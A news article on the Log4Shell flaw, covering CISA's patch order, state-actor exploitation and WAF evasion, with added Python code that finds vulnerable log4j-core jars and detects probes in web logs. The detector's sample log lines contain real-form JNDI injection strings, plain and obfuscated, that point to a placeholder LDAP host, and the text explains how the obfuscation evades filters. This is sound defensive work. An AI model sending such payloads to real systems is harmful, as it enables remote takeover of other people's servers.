In what is turning out to be one of the worst security flaws ever discovered, CISA (the Cybersecurity and Infrastructure Security Agency) has ordered federal civilian agencies to patch systems affected by the Log4Shell vulnerability (CVE-2021-44228) by Christmas Eve. The agency has added the vulnerability to its catalogue of known exploited vulnerabilities along with 12 other security flaws.
The vulnerability was first reported to Apache on November 24 by Alibaba’s Cloud Security team. The first proof-of-concept exploit was published on GitHub on December 9, and the flaw has been actively exploited since then.
Federal agencies have ten days to identify which internal applications and servers use the affected Log4j library, check whether they are vulnerable, and deploy patches, with a December 24 deadline set in the catalogue.
CISA has also launched a webpage guiding the US public and private sectors through the vulnerability. Security researcher Royce Williams is already maintaining a list of over 300 vendors, tracking which are and aren’t affected, and the Dutch National Cyber Security Center maintains a similar list.
Log4j vulnerability keeps escalating
Patches are available: the Apache Software Foundation has released an updated Log4j that fixes the vulnerability. However, the sheer number of applications that bundle the library means that finding every vulnerable copy and deploying patches will not be an easy task.
Even though the vulnerability was only reported in the past few days, it is already considered one of the worst security flaws ever discovered: the library is used throughout enterprise software, the flaw is easy to exploit, and a successful exploit lets an attacker take full control of the affected system.
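The hard part of the patching task described above is inventory: log4j-core is rarely installed on its own but is bundled inside application jars, wars and ears, and a copy from which JndiLookup.class has been removed is mitigated even if its version string is old. The scanner below is an added example, not code from the article, CISA or Apache. It assumes the on-disk layout of log4j-core builds (the `pom.properties` and `JndiLookup.class` paths in the constants) and treats any copy below 2.15.0 that still ships the lookup class as affected by CVE-2021-44228; the archives in `demo()` are constructed in memory to stand in for what a real scan finds.

```python
"""Inventory log4j-core copies on a host, including jars nested inside fat
jars, wars and ears, and flag those that still ship JndiLookup.class.

Added example; not code from the original article, CISA or Apache.
Assumptions: the layout of log4j-core builds (paths below) and that a copy
below 2.15.0 still containing JndiLookup.class is affected by CVE-2021-44228.
"""
import io
import os
import re
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
FIXED_VERSION = (2, 15, 0)  # first release with the JNDI lookup disabled by default


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); unparsable -> None."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def scan_archive(data, label):
    """Return findings for one archive (bytes), recursing into nested archives.

    A finding records where the log4j-core copy lives (outer!inner), the
    version read from pom.properties (or None), whether JndiLookup.class is
    present, and a verdict.
    """
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    names = set(zf.namelist())
    has_jndi = JNDI_LOOKUP_CLASS in names
    version = None
    if POM_PROPERTIES in names:
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    if has_jndi or version is not None:
        parsed = parse_version(version)
        if has_jndi and (parsed is None or parsed < FIXED_VERSION):
            verdict = "VULNERABLE"  # old log4j-core with the lookup class in place
        elif has_jndi:
            verdict = "REVIEW"      # 2.15.0 or later, but the class is still shipped
        else:
            verdict = "MITIGATED"   # JndiLookup.class has been removed from the jar
        findings.append({"where": label, "version": version,
                         "jndi_lookup": has_jndi, "verdict": verdict})
    for name in names:  # fat jars, wars and ears bundle their own copy
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            findings.extend(scan_archive(zf.read(name), f"{label}!{name}"))
    return findings


def scan_tree(root):
    """Scan every archive below `root`; this is the call to run on a real host."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    findings.extend(scan_archive(fh.read(), path))
    return findings


def make_jar(entries):
    """Build an archive in memory from {name: bytes}; constructed test data only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def demo():
    """Constructed archives standing in for what a scan of a real host would find."""
    def pom(version):
        return f"version={version}\nartifactId=log4j-core\n".encode()
    fake_class = b"\xca\xfe\xba\xbe"  # class-file magic only; the contents do not matter here
    old = make_jar({POM_PROPERTIES: pom("2.14.1"), JNDI_LOOKUP_CLASS: fake_class})
    fixed = make_jar({POM_PROPERTIES: pom("2.15.0"), JNDI_LOOKUP_CLASS: fake_class})
    stripped = make_jar({POM_PROPERTIES: pom("2.14.1")})  # after `zip -q -d <jar> .../JndiLookup.class`
    fat = make_jar({"BOOT-INF/lib/log4j-core-2.14.1.jar": old, "app/Main.class": fake_class})
    verdicts = {}
    for label, data in [("log4j-core-2.14.1.jar", old), ("log4j-core-2.15.0.jar", fixed),
                        ("log4j-core-2.14.1-stripped.jar", stripped), ("app.jar", fat)]:
        for finding in scan_archive(data, label):
            verdicts[finding["where"]] = finding["verdict"]
    return verdicts


if __name__ == "__main__":
    for where, verdict in demo().items():
        print(f"{verdict:10s} {where}")
```

On a real host, `scan_tree("/")` (or the application directories) replaces `demo()`. A copy at or above 2.15.0 that still ships the class is reported as REVIEW rather than clean, so the operator checks it against the current Apache advisory instead of trusting the version string alone, and a jar whose version looks old but no longer contains JndiLookup.class is reported as MITIGATED rather than as a false positive.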
Both Microsoft and Mandiant have reported that attackers from China are actively looking to exploit the vulnerability. In an update, Microsoft added that attackers from North Korea, Iran and Turkey are also exploiting it.
Phosphorus, a threat actor from Iran, and Hafnium from China have actively experimented with the flaw.
The number of attacks has also been rising sharply. Check Point reported that exploitation attempts had reached over 40,000 by Saturday, 200,000 by Sunday and 800,000 by Monday, targeting nearly half of corporate networks since attacks exploiting the vulnerability began.
The vulnerability is already being massively abused by malware and botnet operators, with ransomware gangs expected to join in soon.
LunaSec reports that attacks are getting more sophisticated: attackers are obfuscating their payloads to bypass WAFs and get past the first line of defence. The firm also warns that the situation could get worse, since a further vulnerability could emerge that undoes whatever mitigations users have put in place.
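The WAF bypass works because a signature that looks for the literal string `${jndi:` never sees it: Log4j evaluates nested lookups such as `${lower:j}` or `${::-j}` before the JNDI lookup runs, so the request carries the string in pieces, or percent-encoded. The detector below is an added example, not code from the article or from LunaSec. It assumes the Log4j 2.x lookup grammar (`${prefix:key:-default}`, `${lower:...}`, `${upper:...}`), collapses lookups inside-out the way Log4j would before matching, and runs over constructed Apache-style log lines using documentation addresses rather than real hosts; `naive_waf()` is the plain string match such a signature amounts to, shown beside the normalizing check.

```python
"""Detect Log4Shell probes in web server logs even when the payload is
obfuscated to evade a plain "${jndi:" WAF signature.

Added example; not code from the original article or from LunaSec. It
assumes the Log4j 2.x lookup grammar (${prefix:key:-default}, ${lower:x},
${upper:x}) and runs over constructed log lines with documentation addresses.
"""
import re
from urllib.parse import unquote

# an innermost ${...}: its body contains no further "${"
INNERMOST = re.compile(r"\$\{((?:(?!\$\{)[^}])*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def resolve_lookup(body):
    """Evaluate one innermost lookup body the way Log4j would.

    ${::-j}, ${env:NOPE:-j}, ${x:-j} -> 'j'   (lookup fails, the default wins)
    ${lower:J} / ${upper:j}          -> 'j' / 'J'
    anything else (e.g. 'jndi:ldap://...') -> None, i.e. keep it literally
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    return None


def url_decode(text):
    """Undo single or double percent-encoding (%24%7B and %2524%257B -> ${)."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def normalize(text, max_rounds=32):
    """URL-decode, then collapse nested lookups inside-out until nothing changes."""
    text = url_decode(text)

    def substitute(match):
        resolved = resolve_lookup(match.group(1))
        return match.group(0) if resolved is None else resolved

    for _ in range(max_rounds):
        collapsed = INNERMOST.sub(substitute, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def detect(line):
    """Verdict for one log line: hit, whether de-obfuscation was needed, normalized form."""
    normalized = normalize(line)
    hit = bool(JNDI.search(normalized) or JNDI.search(url_decode(line)))
    return {"hit": hit, "obfuscated": hit and normalized != line, "normalized": normalized}


def naive_waf(line):
    """The literal string match that a simple WAF signature amounts to."""
    return "${jndi:" in line.lower()


# Constructed Apache combined-format lines (not real traffic); only line 1 is a plain probe.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:18:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:18:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://198.51.100.23:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:18:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:ldap://198.51.100.23:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:18:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//198.51.100.23:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:18:02:15 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap'
    '%3A%2F%2F198.51.100.23%3A1389%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    '198.51.100.7 - - [10/Dec/2021:18:02:16 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/95.0"',
]


def demo():
    """Compare the naive signature with the normalizing detector on each sample line."""
    rows = []
    for number, line in enumerate(SAMPLE_LOG, 1):
        verdict = detect(line)
        rows.append({"line": number, "naive": naive_waf(line),
                     "hit": verdict["hit"], "obfuscated": verdict["obfuscated"]})
    return rows


if __name__ == "__main__":
    for row in demo():
        print(row)
```

The naive rule fires on the first sample line only; the normalizing check fires on the first five and stays quiet on the ordinary browser request. Resolution is deliberately approximate (only the default-value, `lower` and `upper` forms are evaluated), which is why `detect()` also matches the decoded line before normalization: a match on either form is a hit, so an unusual lookup the resolver does not understand cannot hide an otherwise literal `${jndi:`.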